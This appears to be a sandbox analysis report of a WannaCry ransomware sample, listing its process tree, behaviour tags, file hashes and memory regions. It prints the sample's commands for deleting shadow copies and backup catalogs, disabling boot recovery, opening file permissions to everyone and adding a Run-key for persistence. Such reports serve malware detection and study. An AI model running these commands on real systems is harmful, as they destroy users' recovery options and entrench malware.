C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1032.20.1511302634\1436147368" -childID 3 -isForBrowser -prefsHandle 3592 -prefMapHandle 3588 -prefsLen 7464 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1032 "\\.\pipe\gecko-crash-server-pipe.1032" 3604 tab3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap32579:98:7zEvent21421⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\WannaCry by Rafael.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\WannaCry.EXE"C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\WannaCry.EXE"2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Sets desktop wallpaper using registry
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeattrib +h .3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 127501627111881.bat3⤵
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @WanaDecryptor@.exe vs3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe vs4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet5⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe co3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dfevzalm316" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\tasksche.exe\"" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dfevzalm316" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\tasksche.exe\"" /f4⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\dec0c5e698b94f14ab637674d103c7ae /t 1684 /p 39401⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datMD5
732afbb5163cb75ea45d2b7864434e58
SHA1a24d45e50ec58461ec1a6faecef1a85c3bc5ba56
SHA2561d4d72abe9dda4c880e7601a1f35e11d42102dd67fd75c6757f314292e2f82a0
SHA5122096e8a739de285f7c1d1ee901657893b3d10c99716aa816f1ff9cbd86d7187565bdddf92765582d2e0104584a501b10318f9038ce8360576cdf78463e4d89cf
-
\??\pipe\crashpad_3952_KKUZCFHVWJVYYAUKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/496-290-0x0000000000000000-mapping.dmp
-
memory/988-143-0x0000000000000000-mapping.dmp
-
memory/1252-153-0x0000000000000000-mapping.dmp
-
memory/1304-372-0x0000000000000000-mapping.dmp
-
memory/2064-123-0x00007FFA459C0000-0x00007FFA459C1000-memory.dmpFilesize
4KB
-
memory/2064-121-0x0000000000000000-mapping.dmp
-
memory/2144-412-0x0000000000000000-mapping.dmp
-
memory/2164-325-0x0000000000000000-mapping.dmp
-
memory/2316-122-0x0000000000000000-mapping.dmp
-
memory/2352-789-0x0000000010000000-0x0000000010010000-memory.dmpFilesize
64KB
-
memory/2764-367-0x0000000000000000-mapping.dmp
-
memory/2812-127-0x0000000000000000-mapping.dmp
-
memory/2876-392-0x0000000000000000-mapping.dmp
-
memory/3632-138-0x0000000000000000-mapping.dmp
-
memory/3692-148-0x0000000000000000-mapping.dmp
-
memory/3700-116-0x0000000000000000-mapping.dmp
-
memory/3800-362-0x0000000000000000-mapping.dmp
-
memory/3816-262-0x0000000000000000-mapping.dmp
-
memory/3900-407-0x0000000000000000-mapping.dmp
-
memory/3928-160-0x0000000000000000-mapping.dmp
-
memory/4056-135-0x0000000000000000-mapping.dmp
-
memory/4108-846-0x00000000733D0000-0x0000000073452000-memory.dmpFilesize
520KB
-
memory/4108-844-0x00000000736A0000-0x0000000073722000-memory.dmpFilesize
520KB
-
memory/4108-847-0x00000000733A0000-0x00000000733C2000-memory.dmpFilesize
136KB
-
memory/4108-848-0x0000000000F70000-0x000000000126E000-memory.dmpFilesize
3.0MB
-
memory/4108-838-0x00000000736A0000-0x0000000073722000-memory.dmpFilesize
520KB
-
memory/4108-845-0x0000000073460000-0x000000007367C000-memory.dmpFilesize
2.1MB
-
memory/4200-382-0x0000000000000000-mapping.dmp
-
memory/4240-268-0x0000000000000000-mapping.dmp
-
memory/4264-374-0x0000000000000000-mapping.dmp
-
memory/4356-179-0x0000000000000000-mapping.dmp
-
memory/4380-273-0x0000000000000000-mapping.dmp
-
memory/4460-281-0x0000000000000000-mapping.dmp
-
memory/4496-322-0x0000000000000000-mapping.dmp
-
memory/4496-402-0x0000000000000000-mapping.dmp
-
memory/4504-184-0x0000000000000000-mapping.dmp
-
memory/4520-351-0x0000000000000000-mapping.dmp
-
memory/4584-341-0x0000000000000000-mapping.dmp
-
memory/4628-395-0x0000000000000000-mapping.dmp
-
memory/4744-204-0x0000000000000000-mapping.dmp
-
memory/4744-346-0x0000000000000000-mapping.dmp
-
memory/4776-329-0x0000000000000000-mapping.dmp
-
memory/4784-297-0x0000000000000000-mapping.dmp
-
memory/4796-357-0x0000000000000000-mapping.dmp
-
memory/4864-333-0x0000000000000000-mapping.dmp
-
memory/4884-304-0x0000000000000000-mapping.dmp
-
memory/4920-234-0x0000000000000000-mapping.dmp
-
memory/4944-337-0x0000000000000000-mapping.dmp
-
memory/4952-311-0x0000000000000000-mapping.dmp
-
memory/5080-253-0x0000000000000000-mapping.dmp
-
memory/5092-387-0x0000000000000000-mapping.dmp
-
memory/5096-256-0x0000000000000000-mapping.dmp
-
memory/5168-417-0x0000000000000000-mapping.dmp
-
memory/5184-420-0x0000000000000000-mapping.dmp
-
memory/5196-500-0x0000000000000000-mapping.dmp
-
memory/5200-510-0x0000000000000000-mapping.dmp
-
memory/5220-504-0x0000000000000000-mapping.dmp
-
memory/5264-427-0x0000000000000000-mapping.dmp
-
memory/5340-432-0x0000000000000000-mapping.dmp
-
memory/5368-436-0x0000000000000000-mapping.dmp
-
memory/5412-440-0x0000000000000000-mapping.dmp
-
memory/5548-445-0x0000000000000000-mapping.dmp
-
memory/5616-450-0x0000000000000000-mapping.dmp
-
memory/5672-455-0x0000000000000000-mapping.dmp
-
memory/5732-460-0x0000000000000000-mapping.dmp
-
memory/5796-465-0x0000000000000000-mapping.dmp
-
memory/5812-468-0x0000000000000000-mapping.dmp
-
memory/5844-473-0x0000000000000000-mapping.dmp
-
memory/5956-480-0x0000000000000000-mapping.dmp
-
memory/6016-485-0x0000000000000000-mapping.dmp
-
memory/6032-488-0x0000000000000000-mapping.dmp
-
memory/6060-493-0x0000000000000000-mapping.dmp